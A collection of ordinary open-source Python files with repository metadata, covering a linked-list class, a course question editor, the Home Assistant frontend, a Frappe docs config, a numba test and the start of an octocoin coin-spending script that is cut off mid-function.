previous.next = insert_node
return None
def pop(self, pos=None):
"""Pop list node at specified position.
Time complexity: O(pos).
Space complexity: O(1).
"""
if not self.head:
return None
if not pos:
pos = self.size() - 1
current = self.head
previous = None
counter = 0
while counter < pos and current.next:
previous = current
current = current.next
counter += 1
if not previous:
self.head = current.next
else:
previous.next = current.next
return current.data
def search(self, data):
"""Search data in list.
Time complexity: O(n).
Space complexity: O(1).
"""
if not self.head:
return False
current = self.head
is_found = False
while not is_found and current.next:
if current.data == data:
is_found = True
else:
current = current.next
return is_found
def index(self, data):
"""Obtain node's index in list.
Time complexity: O(n).
Space complexity: O(1).
"""
if not self.head:
return None
current = self.head
is_found = False
counter = 0
while not is_found and current.next:
if current.data == data:
is_found = True
else:
current = current.next
counter += 1
if not is_found:
counter = None
return counter
def main():
a_list = LinkedList()
a_list.append(31)
a_list.append(77)
a_list.append(17)
a_list.append(93)
a_list.append(26)
a_list.append(54)
a_list.show()
a_list = LinkedList()
a_list.prepend(31)
a_list.prepend(77)
a_list.prepend(17)
a_list.prepend(93)
a_list.prepend(26)
a_list.prepend(54)
a_list.show()
print('Is empty: {}'.format(a_list.is_empty()))
print('Size: {}'.format(a_list.size()))
print('Append 45:')
a_list.append(45)
print('Size: {}'.format(a_list.size()))
a_list.show()
print('Delete non-existed 100:')
a_list.delete_with_data(100)
a_list.show()
print('Delete 31:')
a_list.delete_with_data(31)
a_list.show()
print('Delete 45:')
a_list.delete_with_data(45)
a_list.show()
print('Insert 27 at pos 3:')
a_list.insert(3, 27)
a_list.show()
print('Pop pos 3:')
a_list.pop(3)
a_list.show()
print('Search non-existed 100: {}'.format(a_list.search(100)))
print('Search 93: {}'.format(a_list.search(93)))
print('Index non-existed 100: {}'.format(a_list.index(100)))
print('Index 93: {}'.format(a_list.index(93)))
if __name__ == '__main__':
main()
|
{
"content_hash": "cf7049c85f2f3ee1586c586aec88ad42",
"timestamp": "",
"source": "github",
"line_count": 278,
"max_line_length": 68,
"avg_line_length": 23.07913669064748,
"alnum_prop": 0.5151184538653366,
"repo_name": "bowen0701/algorithms_data_structures",
"id": "0f514a0e00c13d52f0f39c76dcbbb965e0f778fc",
"size": "6416",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ds_linked_list.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "108750"
}
],
"symlink_target": ""
}
|
"""Classes supporting creation and editing of questions."""
__author__ = 'John Orr (jorr@google.com)'
import cgi
import copy
import urllib
from common import schema_fields
from controllers.utils import ApplicationHandler
from controllers.utils import BaseRESTHandler
from controllers.utils import XsrfTokenManager
from models import transforms
from models.models import QuestionDAO
from models.models import QuestionDTO
from models.models import SaQuestionConstants
from modules.oeditor import oeditor
import messages
from unit_lesson_editor import CourseOutlineRights
class BaseDatastoreAssetEditor(ApplicationHandler):
def get_form(self, rest_handler, key=''):
"""Build the Jinja template for adding a question."""
rest_url = self.canonicalize_url(rest_handler.URI)
exit_url = self.canonicalize_url('/dashboard?action=assets')
if key:
delete_url = '%s?%s' % (
self.canonicalize_url(rest_handler.URI),
urllib.urlencode({
'key': key,
'xsrf_token': cgi.escape(
self.create_xsrf_token(rest_handler.XSRF_TOKEN))
}))
else:
delete_url = None
schema = rest_handler.get_schema()
return oeditor.ObjectEditor.get_html_for(
self,
schema.get_json_schema(),
schema.get_schema_dict(),
key, rest_url, exit_url,
delete_url=delete_url, delete_method='delete',
required_modules=rest_handler.REQUIRED_MODULES,
extra_js_files=rest_handler.EXTRA_JS_FILES)
class QuestionManagerAndEditor(BaseDatastoreAssetEditor):
"""An editor for editing and managing questions."""
def prepare_template(self, rest_handler, key=''):
"""Build the Jinja template for adding a question."""
template_values = {}
template_values['page_title'] = self.format_title('Edit Question')
template_values['main_content'] = self.get_form(rest_handler, key=key)
return template_values
def get_add_mc_question(self):
self.render_page(self.prepare_template(McQuestionRESTHandler))
def get_add_sa_question(self):
self.render_page(self.prepare_template(SaQuestionRESTHandler))
def get_edit_question(self):
key = self.request.get('key')
question = QuestionDAO.load(key)
if not question:
raise Exception('No question found')
if question.type == QuestionDTO.MULTIPLE_CHOICE:
self.render_page(
self.prepare_template(McQuestionRESTHandler, key=key))
elif question.type == QuestionDTO.SHORT_ANSWER:
self.render_page(
self.prepare_template(SaQuestionRESTHandler, key=key))
else:
raise Exception('Unknown question type: %s' % question.type)
class BaseQuestionRESTHandler(BaseRESTHandler):
"""Common methods for handling REST end points with questions."""
def put(self):
"""Store a question in the datastore in response to a PUT."""
request = transforms.loads(self.request.get('request'))
key = request.get('key')
if not self.assert_xsrf_token_or_fail(
request, self.XSRF_TOKEN, {'key': key}):
return
if not CourseOutlineRights.can_edit(self):
transforms.send_json_response(
self, 401, 'Access denied.', {'key': key})
return
payload = request.get('payload')
question_dict = transforms.loads(payload)
question_dict['description'] = question_dict['description'].strip()
question_dict, errors = self.import_and_validate(question_dict, key)
if errors:
self.validation_error('\n'.join(errors), key=key)
return
if key:
question = QuestionDTO(key, question_dict)
else:
question = QuestionDTO(None, question_dict)
question.type = self.TYPE
key_after_save = QuestionDAO.save(question)
transforms.send_json_response(
self, 200, 'Saved.', payload_dict={'key': key_after_save})
def delete(self):
"""Remove a question from the datastore in response to DELETE."""
key = self.request.get('key')
if not self.assert_xsrf_token_or_fail(
self.request, self.XSRF_TOKEN, {'key': key}):
return
if not CourseOutlineRights.can_delete(self):
transforms.send_json_response(
self, 401, 'Access denied.', {'key': key})
return
question = QuestionDAO.load(key)
if not question:
transforms.send_json_response(
self, 404, 'Question not found.', {'key': key})
return
used_by = QuestionDAO.used_by(question.id)
if used_by:
group_names = ['"%s"' % x for x in used_by]
transforms.send_json_response(
self, 403,
('Question in use by question groups:\n%s.\nPlease delete it '
'from those groups and try again.') % ',\n'.join(group_names),
{'key': key})
return
QuestionDAO.delete(question)
transforms.send_json_response(self, 200, 'Deleted.')
def validate_no_description_collision(self, description, key, errors):
descriptions = {q.description for q in QuestionDAO.get_all()
if not key or q.id != long(key)}
if description in descriptions:
errors.append(
'The description must be different from existing questions.')
class McQuestionRESTHandler(BaseQuestionRESTHandler):
"""REST handler for editing multiple choice questions."""
URI = '/rest/question/mc'
REQUIRED_MODULES = [
'array-extras', 'gcb-rte', 'inputex-radio', 'inputex-select',
'inputex-string', 'inputex-list', 'inputex-number', 'inputex-hidden']
EXTRA_JS_FILES = ['mc_question_editor_lib.js', 'mc_question_editor.js']
TYPE = QuestionDTO.MULTIPLE_CHOICE
XSRF_TOKEN = 'mc-question-edit'
SCHEMA_VERSION = '1.5'
@classmethod
def get_schema(cls):
"""Get the InputEx schema for the multiple choice question editor."""
mc_question = schema_fields.FieldRegistry(
'Multiple Choice Question',
description='multiple choice question',
extra_schema_dict_values={'className': 'mc-container'})
mc_question.add_property(schema_fields.SchemaField(
'version', '', 'string', optional=True, hidden=True))
mc_question.add_property(schema_fields.SchemaField(
'question', 'Question', 'html', optional=True,
extra_schema_dict_values={'className': 'mc-question'}))
mc_question.add_property(schema_fields.SchemaField(
'description', 'Description', 'string', optional=True,
extra_schema_dict_values={'className': 'mc-description'},
description=messages.QUESTION_DESCRIPTION))
mc_question.add_property(schema_fields.SchemaField(
'multiple_selections', 'Selection', 'boolean',
optional=True,
select_data=[
('false', 'Allow only one selection'),
('true', 'Allow multiple selections')],
extra_schema_dict_values={
'_type': 'radio',
'className': 'mc-selection'}))
choice_type = schema_fields.FieldRegistry(
'Choice',
extra_schema_dict_values={'className': 'mc-choice'})
choice_type.add_property(schema_fields.SchemaField(
'score', 'Score', 'string', optional=True,
extra_schema_dict_values={
'className': 'mc-choice-score', 'value': '0'}))
choice_type.add_property(schema_fields.SchemaField(
'text', 'Text', 'html', optional=True,
extra_schema_dict_values={'className': 'mc-choice-text'}))
choice_type.add_property(schema_fields.SchemaField(
'feedback', 'Feedback', 'html', optional=True,
extra_schema_dict_values={'className': 'mc-choice-feedback'}))
choices_array = schema_fields.FieldArray(
'choices', '', item_type=choice_type,
extra_schema_dict_values={
'className': 'mc-choice-container',
'listAddLabel': 'Add a choice',
'listRemoveLabel': 'Delete choice'})
mc_question.add_property(choices_array)
return mc_question
def get(self):
"""Get the data to populate the question editor form."""
def export(q_dict):
p_dict = copy.deepcopy(q_dict)
# InputEx does not correctly roundtrip booleans, so pass strings
p_dict['multiple_selections'] = (
'true' if q_dict.get('multiple_selections') else 'false')
return p_dict
key = self.request.get('key')
if not CourseOutlineRights.can_view(self):
transforms.send_json_response(
self, 401, 'Access denied.', {'key': key})
return
if key:
question = QuestionDAO.load(key)
payload_dict = export(question.dict)
else:
payload_dict = {
'version': self.SCHEMA_VERSION,
'question': '',
'description': '',
'multiple_selections': 'false',
'choices': [
{'score': '1', 'text': '', 'feedback': ''},
{'score': '0', 'text': '', 'feedback': ''},
{'score': '0', 'text': '', 'feedback': ''},
{'score': '0', 'text': '', 'feedback': ''}
]}
transforms.send_json_response(
self, 200, 'Success',
payload_dict=payload_dict,
xsrf_token=XsrfTokenManager.create_xsrf_token(self.XSRF_TOKEN))
def import_and_validate(self, unvalidated_dict, key):
version = unvalidated_dict.get('version')
if self.SCHEMA_VERSION != version:
return (None, ['Version %s question not supported.' % version])
return self._import_and_validate15(unvalidated_dict, key)
def _import_and_validate15(self, unvalidated_dict, key):
errors = []
try:
question_dict = transforms.json_to_dict(
unvalidated_dict, self.get_schema().get_json_schema_dict())
except ValueError as err:
errors.append(str(err))
return (None, errors)
if not question_dict['question'].strip():
errors.append('The question must have a non-empty body.')
if not question_dict['description']:
errors.append('The description must be non-empty.')
self.validate_no_description_collision(
question_dict['description'], key, errors)
if not question_dict['choices']:
errors.append('The question must have at least one choice.')
choices = question_dict['choices']
for index in range(0, len(choices)):
choice = choices[index]
if not choice['text'].strip():
errors.append('Choice %s has no response text.' % (index + 1))
try:
# Coefrce the score attrib into a python float
choice['score'] = float(choice['score'])
except ValueError:
errors.append(
'Choice %s must have a numeric score.' % (index + 1))
return (question_dict, errors)
class SaQuestionRESTHandler(BaseQuestionRESTHandler):
"""REST handler for editing short answer questions."""
URI = '/rest/question/sa'
REQUIRED_MODULES = [
'gcb-rte', 'inputex-select', 'inputex-string', 'inputex-list',
'inputex-hidden', 'inputex-integer']
EXTRA_JS_FILES = []
TYPE = QuestionDTO.SHORT_ANSWER
XSRF_TOKEN = 'sa-question-edit'
GRADER_TYPES = [
('case_insensitive', 'Case insensitive string match'),
('regex', 'Regular expression'),
('numeric', 'Numeric')]
SCHEMA_VERSION = '1.5'
@classmethod
def get_schema(cls):
"""Get the InputEx schema for the short answer question editor."""
sa_question = schema_fields.FieldRegistry(
'Short Answer Question',
description='short answer question',
extra_schema_dict_values={'className': 'sa-container'})
sa_question.add_property(schema_fields.SchemaField(
'version', '', 'string', optional=True, hidden=True))
sa_question.add_property(schema_fields.SchemaField(
'question', 'Question', 'html', optional=True,
extra_schema_dict_values={'className': 'sa-question'}))
sa_question.add_property(schema_fields.SchemaField(
'description', 'Description', 'string', optional=True,
extra_schema_dict_values={'className': 'sa-description'},
description=messages.QUESTION_DESCRIPTION))
sa_question.add_property(schema_fields.SchemaField(
'hint', 'Hint', 'html', optional=True,
extra_schema_dict_values={'className': 'sa-hint'}))
sa_question.add_property(schema_fields.SchemaField(
'defaultFeedback', 'Feedback', 'html', optional=True,
extra_schema_dict_values={'className': 'sa-feedback'},
description=messages.INCORRECT_ANSWER_FEEDBACK))
sa_question.add_property(schema_fields.SchemaField(
'rows', 'Rows', 'string', optional=True,
extra_schema_dict_values={
'className': 'sa-rows',
'value': SaQuestionConstants.DEFAULT_HEIGHT_ROWS
},
description=messages.INPUT_FIELD_HEIGHT_DESCRIPTION))
sa_question.add_property(schema_fields.SchemaField(
'columns', 'Columns', 'string', optional=True,
extra_schema_dict_values={
'className': 'sa-columns',
'value': SaQuestionConstants.DEFAULT_WIDTH_COLUMNS
},
description=messages.INPUT_FIELD_WIDTH_DESCRIPTION))
grader_type = schema_fields.FieldRegistry(
'Answer',
extra_schema_dict_values={'className': 'sa-grader'})
grader_type.add_property(schema_fields.SchemaField(
'score', 'Score', 'string', optional=True,
extra_schema_dict_values={'className': 'sa-grader-score'}))
grader_type.add_property(schema_fields.SchemaField(
'matcher', 'Grading', 'string', optional=True,
select_data=cls.GRADER_TYPES,
extra_schema_dict_values={'className': 'sa-grader-score'}))
grader_type.add_property(schema_fields.SchemaField(
'response', 'Response', 'string', optional=True,
extra_schema_dict_values={'className': 'sa-grader-text'}))
grader_type.add_property(schema_fields.SchemaField(
'feedback', 'Feedback', 'html', optional=True,
extra_schema_dict_values={'className': 'sa-grader-feedback'}))
graders_array = schema_fields.FieldArray(
'graders', '', item_type=grader_type,
extra_schema_dict_values={
'className': 'sa-grader-container',
'listAddLabel': 'Add an answer',
'listRemoveLabel': 'Delete this answer'})
sa_question.add_property(graders_array)
return sa_question
def get(self):
"""Get the data to populate the question editor form."""
key = self.request.get('key')
if not CourseOutlineRights.can_view(self):
transforms.send_json_response(
self, 401, 'Access denied.', {'key': key})
return
if key:
question = QuestionDAO.load(key)
payload_dict = question.dict
else:
payload_dict = {
'version': self.SCHEMA_VERSION,
'question': '',
'description': '',
'graders': [
{
'score': '1.0',
'matcher': 'case_insensitive',
'response': '',
'feedback': ''}]}
transforms.send_json_response(
self, 200, 'Success',
payload_dict=payload_dict,
xsrf_token=XsrfTokenManager.create_xsrf_token(self.XSRF_TOKEN))
def import_and_validate(self, unvalidated_dict, key):
version = unvalidated_dict.get('version')
if self.SCHEMA_VERSION != version:
return (None, ['Version %s question not supported.' % version])
return self._import_and_validate15(unvalidated_dict, key)
def _import_and_validate15(self, unvalidated_dict, key):
errors = []
try:
question_dict = transforms.json_to_dict(
unvalidated_dict, self.get_schema().get_json_schema_dict())
except ValueError as err:
errors.append(str(err))
return (None, errors)
if not question_dict['question'].strip():
errors.append('The question must have a non-empty body.')
if not question_dict['description']:
errors.append('The description must be non-empty.')
self.validate_no_description_collision(
question_dict['description'], key, errors)
try:
# Coerce the rows attrib into a python int
question_dict['rows'] = int(question_dict['rows'])
if question_dict['rows'] <= 0:
errors.append('Rows must be a positive whole number')
except ValueError:
errors.append('Rows must be a whole number')
try:
# Coerce the cols attrib into a python int
question_dict['columns'] = int(question_dict['columns'])
if question_dict['columns'] <= 0:
errors.append('Columns must be a positive whole number')
except ValueError:
errors.append('Columns must be a whole number')
if not question_dict['graders']:
errors.append('The question must have at least one answer.')
graders = question_dict['graders']
for index in range(0, len(graders)):
grader = graders[index]
assert grader['matcher'] in [
matcher for (matcher, unused_text) in self.GRADER_TYPES]
if not grader['response'].strip():
errors.append('Answer %s has no response text.' % (index + 1))
try:
float(grader['score'])
except ValueError:
errors.append(
'Answer %s must have a numeric score.' % (index + 1))
return (question_dict, errors)
|
{
"content_hash": "b5df7fdb964e13a4a2560ff9ce464101",
"timestamp": "",
"source": "github",
"line_count": 482,
"max_line_length": 79,
"avg_line_length": 39.02697095435685,
"alnum_prop": 0.5825846579129232,
"repo_name": "leo-at-rsmart/shiny-octo-batman",
"id": "b551a6ab2bec3d844464bb7c904706e76d3c8d4f",
"size": "19409",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "modules/dashboard/question_editor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "20690"
},
{
"name": "JavaScript",
"bytes": "314706"
},
{
"name": "Python",
"bytes": "1340529"
},
{
"name": "TeX",
"bytes": "2086"
}
],
"symlink_target": ""
}
|
"""Handle the frontend for Home Assistant."""
import asyncio
import hashlib
import json
import logging
import os
from aiohttp import web
from homeassistant.core import callback
from homeassistant.const import HTTP_NOT_FOUND
from homeassistant.components import api, group
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.http.auth import is_trusted_ip
from homeassistant.components.http.const import KEY_DEVELOPMENT
from .version import FINGERPRINTS
DOMAIN = 'frontend'
DEPENDENCIES = ['api', 'websocket_api']
URL_PANEL_COMPONENT = '/frontend/panels/{}.html'
URL_PANEL_COMPONENT_FP = '/frontend/panels/{}-{}.html'
STATIC_PATH = os.path.join(os.path.dirname(__file__), 'www_static')
MANIFEST_JSON = {
"background_color": "#FFFFFF",
"description": "Open-source home automation platform running on Python 3.",
"dir": "ltr",
"display": "standalone",
"icons": [],
"lang": "en-US",
"name": "Home Assistant",
"short_name": "Assistant",
"start_url": "/",
"theme_color": "#03A9F4"
}
for size in (192, 384, 512, 1024):
MANIFEST_JSON['icons'].append({
"src": "/static/icons/favicon-{}x{}.png".format(size, size),
"sizes": "{}x{}".format(size, size),
"type": "image/png"
})
DATA_PANELS = 'frontend_panels'
DATA_INDEX_VIEW = 'frontend_index_view'
# To keep track we don't register a component twice (gives a warning)
_REGISTERED_COMPONENTS = set()
_LOGGER = logging.getLogger(__name__)
def register_built_in_panel(hass, component_name, sidebar_title=None,
sidebar_icon=None, url_path=None, config=None):
"""Register a built-in panel."""
path = 'panels/ha-panel-{}.html'.format(component_name)
if hass.http.development:
url = ('/static/home-assistant-polymer/panels/'
'{0}/ha-panel-{0}.html'.format(component_name))
else:
url = None # use default url generate mechanism
register_panel(hass, component_name, os.path.join(STATIC_PATH, path),
FINGERPRINTS[path], sidebar_title, sidebar_icon, url_path,
url, config)
def register_panel(hass, component_name, path, md5=None, sidebar_title=None,
sidebar_icon=None, url_path=None, url=None, config=None):
"""Register a panel for the frontend.
component_name: name of the web component
path: path to the HTML of the web component
md5: the md5 hash of the web component (for versioning, optional)
sidebar_title: title to show in the sidebar (optional)
sidebar_icon: icon to show next to title in sidebar (optional)
url_path: name to use in the url (defaults to component_name)
url: for the web component (for dev environment, optional)
config: config to be passed into the web component
Warning: this API will probably change. Use at own risk.
"""
panels = hass.data.get(DATA_PANELS)
if panels is None:
panels = hass.data[DATA_PANELS] = {}
if url_path is None:
url_path = component_name
if url_path in panels:
_LOGGER.warning('Overwriting component %s', url_path)
if not os.path.isfile(path):
_LOGGER.error('Panel %s component does not exist: %s',
component_name, path)
return
if md5 is None:
with open(path) as fil:
md5 = hashlib.md5(fil.read().encode('utf-8')).hexdigest()
data = {
'url_path': url_path,
'component_name': component_name,
}
if sidebar_title:
data['title'] = sidebar_title
if sidebar_icon:
data['icon'] = sidebar_icon
if config is not None:
data['config'] = config
if url is not None:
data['url'] = url
else:
url = URL_PANEL_COMPONENT.format(component_name)
if url not in _REGISTERED_COMPONENTS:
hass.http.register_static_path(url, path)
_REGISTERED_COMPONENTS.add(url)
fprinted_url = URL_PANEL_COMPONENT_FP.format(component_name, md5)
data['url'] = fprinted_url
panels[url_path] = data
# Register index view for this route if IndexView already loaded
# Otherwise it will be done during setup.
index_view = hass.data.get(DATA_INDEX_VIEW)
if index_view:
hass.http.app.router.add_route('get', '/{}'.format(url_path),
index_view.get)
def add_manifest_json_key(key, val):
"""Add a keyval to the manifest.json."""
MANIFEST_JSON[key] = val
def setup(hass, config):
"""Setup serving the frontend."""
hass.http.register_view(BootstrapView)
hass.http.register_view(ManifestJSONView)
if hass.http.development:
sw_path = "home-assistant-polymer/build/service_worker.js"
else:
sw_path = "service_worker.js"
hass.http.register_static_path("/service_worker.js",
os.path.join(STATIC_PATH, sw_path), 0)
hass.http.register_static_path("/robots.txt",
os.path.join(STATIC_PATH, "robots.txt"))
hass.http.register_static_path("/static", STATIC_PATH)
local = hass.config.path('www')
if os.path.isdir(local):
hass.http.register_static_path("/local", local)
index_view = hass.data[DATA_INDEX_VIEW] = IndexView()
hass.http.register_view(index_view)
# Components have registered panels before frontend got setup.
# Now register their urls.
if DATA_PANELS in hass.data:
for url_path in hass.data[DATA_PANELS]:
hass.http.app.router.add_route('get', '/{}'.format(url_path),
index_view.get)
else:
hass.data[DATA_PANELS] = {}
register_built_in_panel(hass, 'map', 'Map', 'mdi:account-location')
for panel in ('dev-event', 'dev-info', 'dev-service', 'dev-state',
'dev-template'):
register_built_in_panel(hass, panel)
return True
class BootstrapView(HomeAssistantView):
"""View to bootstrap frontend with all needed data."""
url = "/api/bootstrap"
name = "api:bootstrap"
@callback
def get(self, request):
"""Return all data needed to bootstrap Home Assistant."""
hass = request.app['hass']
return self.json({
'config': hass.config.as_dict(),
'states': hass.states.async_all(),
'events': api.async_events_json(hass),
'services': api.async_services_json(hass),
'panels': hass.data[DATA_PANELS],
})
class IndexView(HomeAssistantView):
"""Serve the frontend."""
url = '/'
name = "frontend:index"
requires_auth = False
extra_urls = ['/states', '/states/{entity_id}']
def __init__(self):
"""Initialize the frontend view."""
from jinja2 import FileSystemLoader, Environment
self.templates = Environment(
loader=FileSystemLoader(
os.path.join(os.path.dirname(__file__), 'templates/')
)
)
@asyncio.coroutine
def get(self, request, entity_id=None):
"""Serve the index view."""
hass = request.app['hass']
if entity_id is not None:
state = hass.states.get(entity_id)
if (not state or state.domain != 'group' or
not state.attributes.get(group.ATTR_VIEW)):
return self.json_message('Entity not found', HTTP_NOT_FOUND)
if request.app[KEY_DEVELOPMENT]:
core_url = '/static/home-assistant-polymer/build/core.js'
ui_url = '/static/home-assistant-polymer/src/home-assistant.html'
else:
core_url = '/static/core-{}.js'.format(
FINGERPRINTS['core.js'])
ui_url = '/static/frontend-{}.html'.format(
FINGERPRINTS['frontend.html'])
if request.path == '/':
panel = 'states'
else:
panel = request.path.split('/')[1]
if panel == 'states':
panel_url = ''
else:
panel_url = hass.data[DATA_PANELS][panel]['url']
no_auth = 'true'
if hass.config.api.api_password:
# require password if set
no_auth = 'false'
if is_trusted_ip(request):
# bypass for trusted networks
no_auth = 'true'
icons_url = '/static/mdi-{}.html'.format(FINGERPRINTS['mdi.html'])
template = yield from hass.loop.run_in_executor(
None, self.templates.get_template, 'index.html')
# pylint is wrong
# pylint: disable=no-member
# This is a jinja2 template, not a HA template so we call 'render'.
resp = template.render(
core_url=core_url, ui_url=ui_url, no_auth=no_auth,
icons_url=icons_url, icons=FINGERPRINTS['mdi.html'],
panel_url=panel_url, panels=hass.data[DATA_PANELS])
return web.Response(text=resp, content_type='text/html')
class ManifestJSONView(HomeAssistantView):
"""View to return a manifest.json."""
requires_auth = False
url = "/manifest.json"
name = "manifestjson"
@asyncio.coroutine
def get(self, request): # pylint: disable=no-self-use
"""Return the manifest.json."""
msg = json.dumps(MANIFEST_JSON, sort_keys=True).encode('UTF-8')
return web.Response(body=msg, content_type="application/manifest+json")
|
{
"content_hash": "ccc1e6f0399c21b3b72948437ee43a84",
"timestamp": "",
"source": "github",
"line_count": 284,
"max_line_length": 79,
"avg_line_length": 33.144366197183096,
"alnum_prop": 0.6082014235631573,
"repo_name": "eagleamon/home-assistant",
"id": "4d9fb8624d8180b91e9aae8db4188fe4ae90ceb0",
"size": "9413",
"binary": false,
"copies": "6",
"ref": "refs/heads/dev",
"path": "homeassistant/components/frontend/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1510047"
},
{
"name": "Python",
"bytes": "5066084"
},
{
"name": "Ruby",
"bytes": "379"
},
{
"name": "Shell",
"bytes": "14079"
}
],
"symlink_target": ""
}
|
source_link = "https://github.com/frappe/frappe"
docs_base_url = "https://frappe.github.io/frappe"
headline = "Superhero Web Framework"
sub_heading = "Build extensions to ERPNext or make your own app"
hide_install = True
long_description = """Frappe is a full stack web application framework written in Python,
Javascript, HTML/CSS with MySQL as the backend. It was built for ERPNext
but is pretty generic and can be used to build database driven apps.
The key differece in Frappe compared to other frameworks is that Frappe
is that meta-data is also treated as data and is used to build front-ends
very easily. Frappe comes with a full blown admin UI called the **Desk**
that handles forms, navigation, lists, menus, permissions, file attachment
and much more out of the box.
Frappe also has a plug-in architecture that can be used to build plugins
to ERPNext.
Frappe Framework was designed to build [ERPNext](https://erpnext.com), open source
ERP for managing small and medium sized businesses.
[Get started with the Tutorial](https://frappe.github.io/frappe/user/)
"""
docs_version = "7.x.x"
def get_context(context):
context.top_bar_items = [
{"label": "Developer Tutorials", "url": context.docs_base_url + "/user", "right": 1},
{"label": "API Documentation", "url": context.docs_base_url + "/current", "right": 1}
]
|
{
"content_hash": "c88e21c0313b3a9c319d474c541c4c07",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 89,
"avg_line_length": 44.4,
"alnum_prop": 0.7484984984984985,
"repo_name": "drukhil/frappe",
"id": "dd90839762d7117fca86ede9735cd06a09303a89",
"size": "1333",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "frappe/config/docs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "321189"
},
{
"name": "GCC Machine Description",
"bytes": "2474"
},
{
"name": "HTML",
"bytes": "180275"
},
{
"name": "JavaScript",
"bytes": "1102401"
},
{
"name": "Python",
"bytes": "1438197"
},
{
"name": "Shell",
"bytes": "517"
}
],
"symlink_target": ""
}
|
import unittest
from numba.core.compiler import compile_isolated, Flags
from numba.core import types, utils
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
def is_in_mandelbrot(c):
i = 0
z = 0.0j
for i in range(100):
z = z ** 2 + c
if (z.real * z.real + z.imag * z.imag) >= 4:
return False
return True
class TestMandelbrot(unittest.TestCase):
def test_mandelbrot(self):
pyfunc = is_in_mandelbrot
cr = compile_isolated(pyfunc, (types.complex64,))
cfunc = cr.entry_point
points = [0+0j, 1+0j, 0+1j, 1+1j, 0.1+0.1j]
for p in points:
self.assertEqual(cfunc(p), pyfunc(p))
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "8b6189ed51a2031d770973872dc78c68",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 57,
"avg_line_length": 23.314285714285713,
"alnum_prop": 0.6078431372549019,
"repo_name": "sklam/numba",
"id": "43826b1ec538b4a1e270f5f47fafc141ec308f97",
"size": "816",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "numba/tests/test_mandelbrot.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "6783"
},
{
"name": "C",
"bytes": "638283"
},
{
"name": "C++",
"bytes": "52741"
},
{
"name": "Cuda",
"bytes": "214"
},
{
"name": "GDB",
"bytes": "101"
},
{
"name": "HTML",
"bytes": "3464"
},
{
"name": "Python",
"bytes": "7918676"
},
{
"name": "Shell",
"bytes": "7823"
}
],
"symlink_target": ""
}
|
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the octocoin data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/Octocoin/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "Octocoin")
return os.path.expanduser("~/.octocoin")
def read_bitcoin_config(dbdir):
"""Read the octocoin.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "octocoin.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a octocoin JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19332 if testnet else 9332
connect = "http://%s:%s@127.0.0.1:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the octocoind we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(octocoind):
info = octocoind.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
octocoind.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = octocoind.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(octocoind):
address_summary = dict()
address_to_account = dict()
for info in octocoind.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = octocoind.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = octocoind.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-octocoin-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
def create_tx(octocoind, fromaddresses, toaddress, amount, fee):
all_coins = list_available(octocoind)
